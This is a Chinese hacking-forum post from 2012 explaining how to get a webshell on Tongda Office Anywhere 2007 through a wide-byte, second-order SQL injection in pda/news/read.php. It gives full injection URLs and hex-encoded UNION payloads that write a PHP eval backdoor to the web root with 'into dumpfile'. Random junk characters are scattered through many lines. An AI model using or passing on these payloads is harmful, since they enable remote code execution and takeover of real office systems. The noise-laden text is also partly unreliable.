找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2390|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
目前测试通达OA2007版本+ g- c: e( U' j$ {8 t8 C
6 z. _; T) b  l7 g
& a$ _( y/ k6 ^; t8 k  h5 \
Office Anywhere 2007 网络智能办公系统2 k+ ~: J4 i' t8 z8 ~- D2 y5 K: O$ v
; N" {5 V0 k$ I& `0 X8 D/ i
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
6 o' j( M* d! k* G0 J% L. q . c0 ?$ A# ?( Y8 ?1 i
* @  W7 L% a) P" g
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的4 C% T( }3 q2 P, e

( R: [/ u, F5 _. o例如:SELECT * from USER where USER_ID='{$USERNAME}'  1 x( I" b5 _0 G) k* @% ^( o2 k1 q
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了+ v3 D# T; U. H. F' `+ C

7 ^; J# w  w  q/ Z2 Q" S& `这个时候我们是不是可以组合起来使用哪?! g0 p0 z5 p+ G; d) h
2 H3 b% o; I1 @, |. l
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样* w6 ?  v* \& O
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10: }0 {1 p# `' V6 T$ `- ^" X
( X0 f5 {2 d# G
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了7 [/ g) m5 N) L, E. g. N: a
8 \* h/ F7 ^/ P8 H! N$ w) J
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。5 b( Z' a0 X" e. c: W6 T$ S; }
5 x' R+ g5 w% n: ~
那么我们用字符串格式带入进行hex编码9 j* M- H* `8 v0 v( y+ m

# M5 ]9 L' W( G/ o%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
  e2 g; g2 |' s! j) V, S& y 4 a2 F: b+ w1 z! s& h6 R
测试ok,获取oa的webshell
: z  E* a. h1 M) i ; v' r6 S! S' Q) v! Y# e) y, L
1 K) b* a, b" ]9 N! P
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
* B1 Z" J: Q# S9 B% Z% ~/ A( B直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表